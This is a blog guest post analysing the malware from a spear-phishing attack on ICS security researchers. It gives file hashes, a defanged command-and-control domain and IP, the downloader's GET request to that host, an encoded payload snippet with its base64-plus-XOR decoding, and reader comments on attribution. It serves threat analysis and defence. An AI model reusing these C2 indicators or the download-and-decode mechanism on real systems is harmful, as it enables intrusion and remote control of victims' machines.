Analysis of Spear Phishing Malware File

SCADA malware

The following is guest post courtesy of Ned Moran of the Shadowserver Foundation. This post is a technical analysis of the malware used in a spear phishing attack targeting those interested in ICS security .

Dale was kind enough to share a copy of the spear phishing email that he posted about here. This spear phish contained a link to a zip file hosted at hxxp://research.digitalvortex.com/. The downloaded zip file had the following properties:

File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.zip

Size: 1886505

MD5:  820B1CD69828983C089370BDC3CF5870

This archive contained an executable with the following properties:

File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.exe

Size: 2192363

MD5:  C6B95B178188B8C35D14BED40520E685

When executed in a lab environment this executable installed a Trojan downloader with the following properties:

File: spoolsvr.exe

Size: 73728

MD5:  5FF3269FACA4A67D1A4C537154AAAD4B

Path: C:\Documents and Settings\Administrator\Local Settings\Temp\spoolsvr.exe

As shown by this VirusTotal report, this downloader was only detected by 7 of 42 antivirus products. This downloader connects to a command and control server at hxxp://hint[.]happyforever[.]com via the following GET request:

GET /logo.html HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Host: hint.happyforever.com

Connection: Keep-Alive

The logo.html contained encoded instruction and payload. A snippet of the response is as follows:

<html><head>Ji01LC4tIyZ4eTEuJycyeHByeQ==</head><title>NiMsJSoubCc6Jw==</title><body>DxjSQkFCQkJGQkJCvb1CQvpCQkJCQkJCAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC

QkJCmkJCQkxd+ExC9kuPY/pDDo9jFiorMWIyMC0lMCMvYiEjLCwtNmIgJ2IwNyxiKyxiBg0RYi8t

JidsT09IZkJCQkJCQkK+wXCi+qAe8fqgHvH6oB7xebwQ8e+gHvHMhhTxlqAe8ZW/FfH4oB7xeahD

8f2gHvH6oB/xqaAe8cyGFfH0oB7xPaYY8fugHvEQKyEq+qAe8UJCQkJCQkJCEgdCQg5DRkKGWM8N

QkJCQkJCQkKiQk1DSUNEQkLCQ0JCUkNCQkJCQtSoQkJCUkJCQtJDQkJCAkJCUkJCQlJCQkZCQkJC

The above text can be decoded via the following two-step process. First, decode with the standard base64 alphabet and then apply a single byte XOR key of 0×42. The <head> tag will decode to:

 <head>download:;sleep:20;</head>

These commands instruct the spoolsvr.exe downloader to retrieve and decode a secondary payload contained in the <body> tag executable. The <title> tag will decode to:

<title>tanghl.exe</title>

This command instructs the spoolsvr.exe downloader to save the secondary payload decoded from the <body> tag onto the victim machine as tanghl.exe.

The tanghl.exe file is a Remote Access Trojan that gives the attacker full control of the victim machine. This tanghl.exe file had the following properties:

File: tanghl.exe

Size: 167936

MD5:  9B6692295FADF24B512D5F63E4F74D15

Path: C:\Documents and Settings\Administrator\Local Settings\Temp\tanghl.exe

This RAT attempts to connect to another command and control server at 1.234.1.68 over port 80. Communications between the RAT and the control server are encoded via base64 and a single byte XOR key of 0x6b.

The above patterns of attack are very similar to attacks carried by the actors responsible for the Shady RAT campaign documented by McAfee. Similarities include the use of encoded commands hidden in otherwise normal looking webpages as well as an overlap in the command and control infrastructure used in this attack with previous Shady RAT attacks.

Ned Moran is a member of the Shadowserver Foundation (www.shadowserver.org) where he spends his time researching targeted attacks. He can be reached at ned /at/ shadowserver /dot/ org.

Image by Razza Mathadsa

3 comments to Analysis of Spear Phishing Malware File

  • Justin Weddington

    Do you think it is worth it to setup a honeypot behind an IDS to see who tries to remote control to the system?

    Any idea yet on what country this was developed in?

  • Justin Weddington

    Or contacting the registered owner of happyforever.com?

  • Dale G Peterson

    Justin,

    Everyone who is looking at it says China. That said, if you were good at malware development and analysis, you could mimic another’s attack technique to throw them off the scent.

    We have passed the info on to ICS-CERT as well, and they will do what they do. It actually would be helpful if they published additional ICS related spear phishing examples, sanitized if necessary.

    Obviously it has raised our already high attention on our individual system’s integrity, and our hope is it will get others in the ICS to pay attention. If someone is bothering to target little Digital Bond, there is a good chance they are also targeting critical infrastructure owner/operators and vendors where the return on effort is much better.

    Owner/operators should be very concerned about any communication initiated from the corporate network to the ICS and assume that the corporate network is compromised. This is not new, but it is often difficult to convince owner/operators of the risk since they say they have anti-virus, firewalls, etc. This example may help.

    Dale

Leave a Reply